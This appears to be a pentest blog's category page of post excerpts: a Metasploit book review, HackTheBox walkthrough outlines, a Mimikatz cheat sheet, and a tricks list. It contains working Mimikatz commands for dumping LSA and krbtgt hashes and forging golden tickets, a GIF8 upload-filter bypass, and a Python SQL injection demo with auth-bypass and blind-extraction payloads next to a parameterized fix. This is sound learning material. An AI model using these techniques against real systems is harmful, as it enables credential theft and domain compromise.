I have read a lot recently and there is a lot to digest. The blog will get another round of reorganization soon; at the moment the structure is still quite messy. Roughly, it will be split into four main sections: WebApp Pentest, Active Directory, Reverse Engineering, Misc. The first three are the main ones; other topics, such as Cryptography, go under Misc. Merge what should be merged, delete what should be deleted, and keep optimizing so that later I can find the material I need most in the fastest way.
Category: Pentest
Cyber security and penetration test
Find the Topless Photo
So, Heath Adams (aka The Cyber Mentor) is going topless. This is a game. He hides his topless photo somewhere on the internet, and we have to find it. He gave the first clue, which is a sound wave; here is the link. By listening to it, I know it was Morse code….
2020-05-17-Metasploit Penetration Testers Guide
Finished reading Metasploit Penetration Testers Guide. In summary: it is a tool-oriented book and somewhat dated; for example, the msfpayload tool it lists has been replaced by msfvenom. Still, after reading it I have a deeper understanding of Metasploit's overall structure, and it covers some advanced topics such as Meterpreter scripts and importing external exploit code into Metasploit. For beginners like me it is still worth reading; while reading, keep practicing and experimenting, since that is the only way to discover the tools' current usage.
Metasploit
Table of Contents: Intelligence Gathering; Passive Information Gathering (Whois Lookup, NetCraft, NSLookup); Active Information Gathering (Nmap Ipidseq Scan, Running Nmap from MSFconsole, Port Scan in MSF); Targeted Scanning (Server Message Block Scanning, Microsoft SQL Servers, SSH Server Scanning, FTP Scanning, Simple Network Management Protocol Sweeping); Vulnerability Scanning (The Basic Vulnerability Scan, Specialty Vulnerability Scanners, Validating…
Hands On Penetration Testing on Windows – Chapter 1
Table of Contents: Bypassing Network Access Control; Bypassing MAC Filtering (Set Up, Tools Required, Set Up Detail). Bypassing Network Access Control. Bypassing MAC Filtering: You have physical access to the facility and have found an operational VoIP phone (or any other device with a MAC address that is allowed onto the internal network), and its MAC…
0x10-HackTheBox-Active
Table of Contents: Command History; Set Up; Recon (Nmap, Smbclient, Gpp-decrypt); Foothold (GetUserSPNs.py, JohnTheRipper, Psexec.py); Final Words (What is Kerberos?, How Does It Work?, Mitigations); References. Command History: Nmap – found open ports, which pretty much confirmed that this is an AD DC – effective – valuable; smbclient – found share folders – effective – valuable…
Mimikatz
Table of Contents: Dump LSA Hashes; Dump krbtgt Hash; Golden Ticket. Dump LSA Hashes: lsadump::lsa /patch. Dump krbtgt Hash: lsadump::lsa /inject /name:krbtgt. Golden Ticket: kerberos::golden /user:<username> /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-NTLM-hash> /id:500 /ptt (the /sid: value is the domain SID, S-1-5-21-…, not an account SID, and /id:500 is the built-in Administrator RID). If successful: misc::cmd, then list another user's files: dir \\<computer-name>\<drive>$
0x0F-HackTheBox-Control
Table of Contents: Command History; Set Up; Recon (Masscan, Nmap, Check out the Website, Gobuster, The Login Page, Burp Suite, SQL Injection Probe, Sqlmap, Side Notes: How Sqlmap Works); Foothold (MySQL Database, WinPEAS, Sqlmap Dump All Info, PowerShell Code Execution, PHP File Solution); Final Thoughts; References. Command History: masscan – found several service ports –…
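To make the "SQL Injection Probe" and "How Sqlmap Works" steps concrete, here is an added example (not code from the original write-up or from the HTB box) using Python's built-in sqlite3: a login query built by string concatenation next to its parameterized fix, the tautology probe that bypasses the first, and a boolean-based blind loop that recovers a password one character at a time through nothing but the logged-in/not-logged-in answer, which is the inference sqlmap automates. The schema, user and password are constructed.

```python
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table; not the target's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret-pass9')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Login check built by string concatenation: user input becomes SQL syntax."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the input is only ever data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Classic first probe against a login form: closes the string, adds a tautology,
# and comments out the password clause.
AUTH_BYPASS = "' OR 1=1 -- "


def blind_extract_password(conn: sqlite3.Connection, target_user: str,
                           max_len: int = 64) -> str:
    """Boolean-based blind extraction through the login oracle.
    Each query asks 'is character N of the password equal to X?'; the page
    answers only yes/no, but that single bit per query is enough."""
    alphabet = string.ascii_letters + string.digits + "-_!@#$%"   # no quote chars
    recovered = ""
    for pos in range(1, max_len + 1):               # SQLite substr is 1-indexed
        for ch in alphabet:
            payload = (f"' OR (SELECT substr(password,{pos},1) FROM users "
                       f"WHERE username='{target_user}')='{ch}' -- ")
            if login_vulnerable(conn, payload, "irrelevant"):
                recovered += ch
                break
        else:
            break                                   # no match: end of string
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass works on vulnerable login:", login_vulnerable(db, AUTH_BYPASS, "x"))
    print("bypass works on safe login:      ", login_safe(db, AUTH_BYPASS, "x"))
    print("blind-extracted password:        ", blind_extract_password(db, "alice"))
```

The blind loop needs roughly (alphabet size) queries per character, which is why sqlmap's boolean-based technique is slow compared with error- or UNION-based extraction, and why a WAF counting near-identical requests notices it.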
0x0E-HackTheBox-OpenAdmin
Table of Contents: Command History; Set Up; Recon (Masscan, Check Out Website, Gobuster, Manual Explore); Foothold (Manual Enumeration, MySQL, LinEnum, LinPEAS, Go Back and Review, SSH Brute Force, JohnTheRipper); Final Thoughts; References. Command History: masscan – found open ports 22, 80 – effective; nmap – scanned for services – effective; gobuster – found three hidden…
Tricks
Table of Contents: General; Linux (Metasploit, Port Forwarding, Sed, Less, SSH, SSH Tunnel, Bash, NetCat, Nmap, Wget, PHP File Upload Script and Web Server, Tcpdump); Windows; Burp Suite. General: put GIF8; at the top of a payload so that file-type checks that only look at the magic bytes identify it as a GIF image. Linux – Metasploit: import nmap XML output into the database: nmap -Pn -sS -A -oX Subnet1…